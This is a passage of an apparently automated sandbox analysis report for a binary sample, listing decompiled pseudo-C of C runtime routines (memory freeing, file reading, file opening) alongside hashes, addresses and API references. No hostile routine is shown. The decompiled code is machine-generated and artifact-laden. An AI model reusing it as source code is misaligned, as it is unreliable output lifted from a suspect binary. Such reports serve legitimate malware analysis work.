Part of subcall function 00844069: _free.LIBCMT ref: 00844128
Part of subcall function 00844069: _free.LIBCMT ref: 0084413A
Part of subcall function 00844069: _free.LIBCMT ref: 0084414C
Part of subcall function 00844069: _free.LIBCMT ref: 0084415E

_free.LIBCMT ref: 00844DF6

Part of subcall function 0083CCEF: HeapFree.KERNEL32(00000000,00000000,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?), ref: 0083CD05
Part of subcall function 0083CCEF: GetLastError.KERNEL32(?,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?,?), ref: 0083CD17

_free.LIBCMT ref: 00844E18
_free.LIBCMT ref: 00844E2D
_free.LIBCMT ref: 00844E38
_free.LIBCMT ref: 00844E5A
_free.LIBCMT ref: 00844E6D
_free.LIBCMT ref: 00844E7B
_free.LIBCMT ref: 00844E86
_free.LIBCMT ref: 00844EBE
_free.LIBCMT ref: 00844EC5
_free.LIBCMT ref: 00844EE2
_free.LIBCMT ref: 00844EFA

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a54f2e84de93964c1f66c2c1bb6945bc6d2d930b71f9b497bf0cc54d3a9d4edb
Instruction ID: 4b27321cbbaf40a92e06a484d2ff7e855d6d358ac894d4750a64d86777d05af9
Opcode Fuzzy Hash: a54f2e84de93964c1f66c2c1bb6945bc6d2d930b71f9b497bf0cc54d3a9d4edb
Instruction Fuzzy Hash: A63189326007099FEB21AE38DC45B5A73E9FF41362F20682AE059E7191DF34EC81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00423F00 Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00423F00(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E0041CA2B(1, 0x50);
					_v8 = _t235;
					E0041CA88(0);
					if(_t235 != 0) {
						_t228 = E0041CA2B(1, 4);
						_v12 = _t228;
						E0041CA88(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x43b160, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E0041CA2B(1, 4);
							_v16 = _t233;
							E0041CA88(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E0041FE95(_t225);
								_t118 = E0041FE95(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E0041FE95(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E0041FE95(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E0041FE95(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E0041FE95(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E0041FE95(_t225);
								_t142 = E0041FE95(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E0041FE95(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E0041FE95(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E0041FE95(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E0041FE95(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E0041FE95(_t225);
								_t166 = E0041FE95(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E0041FE95(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E0041FE95(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E0041FE95(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E0041FE95(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E0041FE95(_t225);
								_t190 = E0041FE95(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E0041FE95(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00423E02(_v8);
								E0041CA88(_v8);
								E0041CA88(_v12);
								E0041CA88(_v16);
								goto L4;
							}
							E0041CA88(_t235);
							E0041CA88(_v12);
							L7:
							goto L4;
						}
						E0041CA88(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x43b160;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E0041CA88( *(_t209 + 0x88));
							E0041CA88( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x00423f00
0x00423f09
0x00423f10
0x00423f13
0x00423f16
0x00423f1f
0x00423f41
0x00423f45
0x00423f48
0x00423f52
0x00423f65
0x00423f69
0x00423f6c
0x00423f76
0x00423f88
0x0042421a
0x0042421b
0x0042421d
0x00424225
0x00424229
0x0042422e
0x00424239
0x00424245
0x00424251
0x0042425d
0x00424263
0x00424267
0x00424269
0x00424269
0x00000000
0x00424267
0x00423f97
0x00423f9b
0x00423f9e
0x00423fa8
0x00423fbc
0x00423fc2
0x00423fcf
0x00423fe6
0x00423ffd
0x00424014
0x00424024
0x00424031
0x00424048
0x0042405f
0x00424076
0x00424090
0x004240a7
0x004240be
0x004240d5
0x004240ef
0x00424106
0x0042411d
0x00424134
0x0042414e
0x00424165
0x00424172
0x00424173
0x00424175
0x0042417c
0x00424193
0x004241b7
0x004241e5
0x004241f4
0x004241f4
0x004241f8
0x00000000
0x00000000
0x004241e9
0x004241e9
0x004241ef
0x004241fe
0x004241f3
0x004241f3
0x00000000
0x004241f3
0x00424200
0x00424202
0x00424202
0x00424205
0x00424207
0x0042420a
0x00000000
0x0042420e
0x004241f1
0x00000000
0x004241f1
0x00000000
0x004241fa
0x004241bd
0x004241c3
0x004241cc
0x004241d5
0x00000000
0x004241da
0x00423fab
0x00423fb4
0x00423f7e
0x00000000
0x00423f7e
0x00423f79
0x00000000
0x00423f79
0x00423f54
0x00000000
0x00423f29
0x00423f29
0x00423f2b
0x00423f2e
0x0042426b
0x0042426b
0x00424273
0x00424275
0x00424275
0x0042427d
0x00424282
0x00424286
0x0042428e
0x00424296
0x0042429c
0x00424286
0x004242a0
0x004242a5
0x004242ab
0x00000000
0x004242ab

APIs

_free.LIBCMT ref: 00423F48
_free.LIBCMT ref: 00423F6C
_free.LIBCMT ref: 00423F79
_free.LIBCMT ref: 00423F9E
_free.LIBCMT ref: 00423FAB
_free.LIBCMT ref: 00423FB4
_free.LIBCMT ref: 0042428E
_free.LIBCMT ref: 00424296

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: edfbf82b202cc2c81ad30d77a0c4d5fb8d175230b73002c086ee3b25f49cf515
Instruction ID: b755f89f488f4bae6aafbdf0a49396c166c0ad8fb6d28afd7136e00607deb277
Opcode Fuzzy Hash: edfbf82b202cc2c81ad30d77a0c4d5fb8d175230b73002c086ee3b25f49cf515
Instruction Fuzzy Hash: 18C19871E40309ABDB20DBA9DC82FEE77F8AF48744F150066FA04FB282D6749D458768

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF53 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0041BF53(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00411DCE(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00411DE1( *_t137))) = 9;
						L60:
						_t139 = E00411D07();
						goto L61;
					}
					__eflags = _t198 -  *0x43cae0; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x43c8e0 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00411DCE(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00411DE1(__eflags))) = 0x16;
								E00411D07();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0041D4FF(_t154);
								E0041CA88(0);
								E0041CA88(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0041B928(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x43c8e0 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x43c8e0 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x43c8e0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x43c8e0 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x43c8e0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x43c8e0 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x43c8e0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E004266A7(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00411DAB(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00411DE1(__eflags))) = 9;
											 *(E00411DCE(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x43c8e0 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0041BABE();
												} else {
													_t170 = E0041BDC4();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0041BC6D(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x43c8e0 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t111 =  &_v16; // 0xa
									_t178 = ReadConsoleW(_v28, _v24,  *_t111 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00411DE1(__eflags))) = 0xc;
									 *(E00411DCE(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E0041CA88(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x43c8e0 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00411DCE(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00411DE1(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00411DCE(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00411DE1(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x0041bf5c
0x0041bf60
0x0041bf63
0x0041bf7d
0x0041bf7f
0x0041c2e4
0x0041c2e4
0x0041c2e9
0x0041c2e9
0x0041c2f1
0x0041c2f7
0x0041c2f7
0x00000000
0x0041c2f7
0x0041bf85
0x0041bf8b
0x00000000
0x00000000
0x0041bf95
0x0041bf9b
0x0041bf9e
0x0041bfa1
0x0041bfab
0x0041bfae
0x0041bfb1
0x0041bfb5
0x0041bfb7
0x00000000
0x00000000
0x0041bfbd
0x0041bfc0
0x0041bfc6
0x0041bfe0
0x0041bfe2
0x0041c2e0
0x00000000
0x0041c2e0
0x0041bfe8
0x0041bfeb
0x00000000
0x00000000
0x0041bff1
0x0041bff5
0x00000000
0x00000000
0x0041bffb
0x0041bffe
0x0041c002
0x0041c009
0x0041c00b
0x0041c00b
0x0041c00e
0x0041c063
0x0041c065
0x0041c02b
0x0041c030
0x0041c037
0x0041c03d
0x00000000
0x0041c067
0x0041c069
0x0041c06a
0x0041c06c
0x0041c06f
0x0041c071
0x0041c073
0x0041c075
0x0041c075
0x0041c080
0x0041c082
0x0041c089
0x0041c08e
0x0041c091
0x0041c094
0x0041c096
0x0041c0ba
0x0041c0c2
0x0041c0c5
0x0041c0cc
0x0041c0d3
0x0041c0d7
0x0041c0d9
0x0041c0dc
0x0041c0e3
0x0041c0e3
0x0041c0e6
0x0041c0e8
0x0041c0eb
0x0041c0f0
0x0041c0f3
0x0041c0fc
0x0041c100
0x0041c103
0x0041c105
0x0041c10b
0x0041c10d
0x0041c116
0x0041c117
0x0041c119
0x0041c11d
0x0041c11e
0x0041c122
0x0041c125
0x0041c12f
0x0041c134
0x0041c137
0x0041c146
0x0041c14a
0x0041c14d
0x0041c14f
0x0041c151
0x0041c153
0x0041c158
0x0041c15a
0x0041c15e
0x0041c15f
0x0041c165
0x0041c16f
0x0041c170
0x0041c173
0x0041c178
0x0041c17b
0x0041c18a
0x0041c18e
0x0041c191
0x0041c193
0x0041c195
0x0041c197
0x0041c199
0x0041c19f
0x0041c19f
0x0041c1a0
0x0041c1af
0x0041c1b2
0x0041c1b3
0x0041c1b3
0x0041c197
0x0041c193
0x0041c17b
0x0041c153
0x0041c14f
0x0041c137
0x0041c10d
0x0041c105
0x0041c1b9
0x0041c1bf
0x0041c1c1
0x0041c234
0x0041c234
0x0041c238
0x0041c248
0x0041c24e
0x0041c250
0x0041c2ac
0x0041c2ac
0x0041c2b4
0x0041c2b5
0x0041c2b7
0x0041c2d0
0x0041c2d3
0x0041c210
0x0041c211
0x00000000
0x0041c216
0x0041c2d9
0x00000000
0x0041c2d9
0x0041c2be
0x0041c2c9
0x00000000
0x0041c2c9
0x0041c252
0x0041c255
0x0041c258
0x00000000
0x00000000
0x0041c25a
0x0041c25a
0x0041c25d
0x0041c260
0x0041c263
0x0041c26a
0x0041c26f
0x0041c271
0x0041c275
0x0041c290
0x0041c294
0x0041c295
0x0041c298
0x0041c299
0x0041c2a5
0x0041c29b
0x0041c29b
0x0041c29b
0x0041c277
0x0041c277
0x0041c277
0x0041c282
0x0041c287
0x0041c28a
0x0041c28a
0x00000000
0x0041c26f
0x0041c1c6
0x0041c1c9
0x0041c1d0
0x0041c1d5
0x00000000
0x00000000
0x0041c1de
0x0041c1e4
0x0041c1e6
0x00000000
0x00000000
0x0041c1e8
0x0041c1ec
0x00000000
0x00000000
0x0041c1f4
0x0041c200
0x0041c206
0x0041c208
0x0041c22c
0x0041c22f
0x00000000
0x0041c22f
0x0041c20a
0x00000000
0x0041c098
0x0041c09d
0x0041c0a8
0x0041c217
0x0041c217
0x0041c217
0x0041c21a
0x0041c21b
0x00000000
0x0041c223
0x0041c096
0x0041c065
0x0041c010
0x0041c013
0x0041c027
0x0041c029
0x0041c04a
0x0041c04d
0x0041c050
0x0041c053
0x00000000
0x0041c053
0x00000000
0x0041c015
0x0041c015
0x0041c018
0x0041c01b
0x00000000
0x0041c01b
0x0041c013
0x0041bfc8
0x0041bfcd
0x0041bfd5
0x00000000
0x0041bf65
0x0041bf6a
0x0041bf6d
0x0041bf72
0x0041c2fc
0x00000000
0x0041c2fc

Strings

, xrefs: 0041C1F4, 0041C1F9

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: b9bb336bbe5ece8c7d6a5d6048f7bdac2106af37ca075ca663eed56131b14e83
Instruction ID: ee68df94873953e500b047aae6ade89d60c755b411987d29d9a1a359474a5b1c
Opcode Fuzzy Hash: b9bb336bbe5ece8c7d6a5d6048f7bdac2106af37ca075ca663eed56131b14e83
Instruction Fuzzy Hash: D6C1B070E842459FDB15DFE9DCC1BEE7BB0AF49304F04419AE905A7392C7389982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0083C1BA Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0083C45B, 0083C460

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: b9bb336bbe5ece8c7d6a5d6048f7bdac2106af37ca075ca663eed56131b14e83
Instruction ID: 44a158b37b5ee0803cd5868626a89d2266f12820145ea7bbdce55b0372e0c821
Opcode Fuzzy Hash: b9bb336bbe5ece8c7d6a5d6048f7bdac2106af37ca075ca663eed56131b14e83
Instruction Fuzzy Hash: C1C1CDB0A04209AFDF15DFA8C891BBEBBB0FF89340F004569E505FB292C7349941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00426E8E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 43%

			E00426E8E(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E00426BDC(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E00423BDE(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t253 = E00426B47();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00423B29(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x43c8e0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E004268F4(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x43c8e0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x43c8e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x43c8e0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
